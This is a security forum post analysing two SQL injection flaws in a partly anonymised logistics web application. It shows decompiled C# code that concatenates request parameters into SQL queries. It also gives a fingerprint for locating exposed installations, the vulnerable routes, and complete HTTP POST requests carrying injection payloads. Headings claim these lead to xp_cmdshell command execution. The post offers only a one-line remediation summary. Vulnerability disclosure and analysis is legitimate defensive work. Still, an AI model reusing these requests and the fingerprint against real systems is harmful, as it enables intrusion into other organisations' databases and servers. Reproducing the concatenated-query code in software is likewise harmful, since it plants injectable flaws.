奇安信攻防社区-某胜物流软件多处sql注入分析

某胜物流软件多处sql注入分析

一、漏洞简介
======

某胜物流软件多处sql注入分析

二、影响版本
======

某胜物流软件页面无版本号，属于较中版本

三、漏洞原理分析
========

exp1-代码--mvccontroller框架:`MsBaseInfoController`
-----------------------------------------------

```php
using HcUtility.Comm;
using HcUtility.Core;

namespace DSWeb.MvcShipping.Controllers
{
    // Token: 0x02000935 RID: 2357
    [JsonRequestBehavior]
    public class MsBaseInfoController : Controller
    {
    public ContentResult GetBANKList(string condition, string companyid)
            {
                string text = companyid;
                if (text == "" || text == null)
                {
                    text = Convert.ToString(base.Session["COMPANYID"]);
                }
                List<BANK> banklist = MsBaseInfoDAL.GetBANKList(condition, text);
                string content = JsonConvert.Serialize(new
                {
                    Success = true,
                    Message = "查询成功",
                    totalCount = banklist.Count,
                    data = banklist.ToList<BANK>()
                });
                return new ContentResult
                {
                    Content = content
                };
            }
```

### 类位置触发点代码方法，可以看到就是从`MsBaseInfoController`到`MsBaseInfoDAL#GetBANKList`方法传递`**COMPANYID**`参数导致触发`sql查询触发sql注入`

```php
MsBaseInfoDAL
```

```php
// Token: 0x0600D0D5 RID: 53461 RVA: 0x005CD67C File Offset: 0x005CB87C
        public static List<BANK> GetBANKList(string strCondition, string COMPANYID)
        {
            StringBuilder stringBuilder = new StringBuilder();
            stringBuilder.Append(" SELECT ");
            stringBuilder.Append(" '' GID,'' CODENAME,'' CURRENCY,'' BANKNAME,'' ACCOUNT,'' ACCOUNTNAME,'' ISSTOP,'' ISDEF");
            stringBuilder.Append(" union all ");
            stringBuilder.Append(" SELECT ");
            stringBuilder.Append(" GID,CODENAME,CURRENCY,BANKNAME,ACCOUNT,ACCOUNTNAME,ISSTOP,ISDEF");
            stringBuilder.Append(" from sys_bank WHERE LINKID='" + COMPANYID + "'");
            if (!string.IsNullOrEmpty(strCondition))
            {
                stringBuilder.Append(" AND " + strCondition);
            }
            stringBuilder.Append(" order by CODENAME");
            return MsBaseInfoDAL.SetBANKData(stringBuilder);
        }
```

![1752036836701.jpg](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/07/attach-ccb70ea94492dafd1601ae2bbf2a9f491ea4d044.jpg)

exp2-代码--mvccontroller框架:`MsBaseInfoController`
-----------------------------------------------

```php
using HcUtility.Comm;
using HcUtility.Core;

namespace DSWeb.Areas.TruckMng.Controllers
{
    // Token: 0x02000AFD RID: 2813
    [JsonRequestBehavior]
    public class MsWlDriverController : Controller
    {
```

### 类位置触发点代码方法，可以看到就是从`MsWlDriverController`到`MsWlDriver_SalaryDAL.GetDataList`方法传递`**condition**`参数导致触发`sql查询触发sql注入`

```php
MsWlDriver_SalaryDAL
```

```php
// Token: 0x0600F414 RID: 62484 RVA: 0x0084D8C0 File Offset: 0x0084BAC0
        public ContentResult GetDataList_Salary(int start, int limit, string sort, string condition)
        {
            List<MsWlDriver_Salary> dataList = MsWlDriver_SalaryDAL.GetDataList(condition, Convert.ToString(base.Session["USERID"]), CookieConfig.GetCookie_UserCode(base.Request), CookieConfig.GetCookie_OrgCode(base.Request), sort);
            IEnumerable<MsWlDriver_Salary> source = dataList.Skip(start).Take(limit);
            string content = JsonConvert.Serialize(new
            {
                Success = true,
                Message = "查询成功",
                totalCount = dataList.Count,
                data = source.ToList<MsWlDriver_Salary>()
            });
            return new ContentResult
            {
                Content = content
            };
        }
```

![1752036851409.jpg](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/07/attach-1f5fa74b1e9cd0d4ca801834194259477a355220.jpg)

四、环境搭建（闭源系统可提供网络测绘语法和截图）
========================

指纹--`闭源系统`
----------

```php
body="dhtmlxcombo_whp.js"
```

![1752036862114.jpg](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/07/attach-98c388e2e04ba3157e3dd961a561e8ec0fe8baf5.jpg)

五、漏洞复现
======

exp1
----

### 路由

```php
/MvcShipping/MsBaseInfo/GetBANKList
```

### sql注入触发xpcmdhsell命令执行

```php
POST /MvcShipping/MsBaseInfo/GetBANKList HTTP/1.1
Host: xxx
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 456

condition=1&isvisible=true&issavevalue=true&COMPANYID=1'and 1=1 --
```

![1752036874015.jpg](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/07/attach-44150a0039df2b5e5f434cd7fd94b04bab5c9ffa.jpg)

exp2
----

### 路由

```php
/TruckMng/MsWlDriver/GetDataList_Salary
```

### sql注入触发xpcmdhsell命令执行

```php
POST /TruckMng/MsWlDriver/GetDataList_Salary HTTP/1.1
Host: xxx
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 448

aa=1&isvisible=true&issavevalue=true&condition=1'and 1=1 -- &VKNO=true&strACCDATE=true&strUserID=1&start=1&limit=1&sort=a
```

六、总结
====

修复某胜物流软件多处sql注入

发表于 2025-07-21 15:06:51
阅读 ( 379 )
分类：Web应用

某胜物流软件多处sql注入分析

0 条评论